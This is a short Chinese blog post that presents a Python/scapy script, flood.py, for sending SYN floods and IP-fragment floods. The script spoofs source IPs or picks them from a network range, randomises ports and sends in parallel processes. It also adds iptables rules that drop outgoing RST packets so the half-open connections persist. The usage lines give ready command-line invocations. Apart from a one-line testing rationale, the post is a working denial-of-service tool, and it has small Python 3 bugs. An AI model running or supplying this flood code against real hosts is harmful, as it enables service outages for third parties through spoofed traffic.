如何使用python脚本发送sync flood

出于安全行方面考虑需要在某些情况下需模拟sync flood场景。

脚本使用方法:

Fragment Flood

python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.1.1 -D 5000 -c 2000 -F
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.0.0/24 -D 5000 -c 100000 -F

Syn Flood

python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.1.1  -S -c 2000
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -sn 77.12.0.0/24 -S -c 2000

flood.py

from concurrent.futures import ProcessPoolExecutor
import os
import random
import argparse
import traceback
from scapy.all import *
from ipaddress import ip_network

device = 'eth0'
s = None

count = 10
step = int(count / 10)

class Builder():
    def __init__(self):
        self.src_ip = list(ip_network(u'fd14:f60:d4db:7f9:0:66:0:0/112').hosts())
        self.src_port = 0
        self.data = 'X' * 5000
        self.dst_ip = 'fd14:f60:d4db:7f9:0:11:0:1'
        self.dst_port = 80
        self.v6 = False
        self.frag = False

        self.ip_layer = IP
        self.flags = ""
        self.fragment = lambda x: x
        self.get_port = lambda : self.src_port
        self.get_ip = lambda : self.src_ip

    def config(self, args):
        if args.v6 is True:
            self.ip_layer = IPv6
            self.v6 = True

        if args.frag is True and args.v6 is True:
            self.fragment = fragment6
            self.frag = True
        elif args.frag is True:
            self.fragment = fragment
            self.frag = True

        if args.syn is True:
            self.flags="S"

        if args.count is not None:
            count=args.count

        if args.src_port == 0:
            self.get_port = lambda : random.randrange(1,65535)
        else:
            self.src_port = args.src_port

        if args.src_ip is not None:
            self.src_ip = args.src_ip

        if args.src_network is not None:
            self.src_ip = list(ip_network(unicode(args.src_network),strict=False).hosts())
            self.get_ip = lambda : str(random.choice(self.src_ip))

        if args.dst_ip is not None:
            self.dst_ip = args.dst_ip

        if args.dst_port is not None:
            self.dst_port = args.dst_port

        self.data = 'X' * args.payload

    def build_packet(self, i):
        ip=self.ip_layer(src=self.get_ip(),dst=self.dst_ip)
        tcp=TCP(sport=self.get_port(), dport=self.dst_port, flags=self.flags, seq=0)
        packets = [ip/tcp/self.data]
        if self.frag:
            if self.frag is True and self.v6 is True:
                fragments = self.fragment(ip/IPv6ExtHdrFragment()/tcp/self.data, 1023)
            else:
                fragments = self.fragment(ip/tcp/self.data, 1023)
            packets = fragments[1:]

        return packets

builder = Builder()

def send(offset):
    try:
        packets = []
        chunk = offset + step
        for i in range(offset,chunk):
            packets.extend(builder.build_packet(i))
            if len(packets) > step:
                break
        for packet in packets:
            s.send(packet)
        return len(packets)
    except Exception as e:
        print(str(e))
        traceback.print_exc()

def run():
    with ProcessPoolExecutor(max_workers=10) as executor:
        packet_counts = []
        for packet_count in executor.map(send, range(1, count, step)):
            packet_counts.append(packet_count)
    return packet_counts


def parse():
    global builder, s, device, src_ip, data, dst_ip, count, step, syn, frag
    parser = argparse.ArgumentParser(description="help information here")
    parser.add_argument("-v6", "--v6", default=False, action='store_true')
    parser.add_argument("-dev", "--device", type=str, required=True, metavar="eth0", help="iface")
    parser.add_argument("-dp", "--dst-port", type=int, required=True, metavar=1, default=80, help="start destination port")
    parser.add_argument("-di", "--dst-ip", type=str, required=True, metavar="22.52.0.1", help="destination start server")
    parser.add_argument("-sp", "--src-port", type=int, required=False, default = 0, metavar="3000", help="bind source port")
    parser.add_argument("-si", "--src-ip", type=str, required=False, metavar="127.0.0.1", help="bind source ip")
    parser.add_argument("-sn", "--src-network", type=str, required=False, metavar='fd14:f60:d4db:7f9:0:66:0:0/112', help="source network(random ip)")
    parser.add_argument("-S", "--syn", default=False, action='store_true')
    parser.add_argument("-F", "--frag", default=False, action='store_true')
    parser.add_argument("-D", "--payload", type=int, required=False, default = 0, metavar="10", help="payload size.(filled by char 'X'")
    parser.add_argument("-c", "--count", type=int, required=False, default = 10, metavar="10", help="packet count")
    args = parser.parse_args()

    if args.device is not None:
        device = args.device
        s = conf.L3socket(iface=device)

    if args.count is not None:
        count = args.count
        step = int(count / 10)

    builder.config(args)
    return args

def main():
    args = parse()
    if args.v6:
        firewall = 'ip6tables'
    else:
        firewall = 'iptables'

    if args.src_ip is not None:
        os.system('%s -A OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_ip))
    if args.src_network is not None:
        os.system('%s -A OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_network))
    counts = run()
    print('%d packets built. in %d chunks' % (sum(counts), len(counts)))
    if args.src_ip is not None:
        os.system('%s -D OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_ip))
    if args.src_network is not None:
        os.system('%s -D OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_network))

if __name__ == '__main__':
    main()
posted @ 2021-08-04 11:22  无知是恶  阅读(272)  评论(1编辑  收藏  举报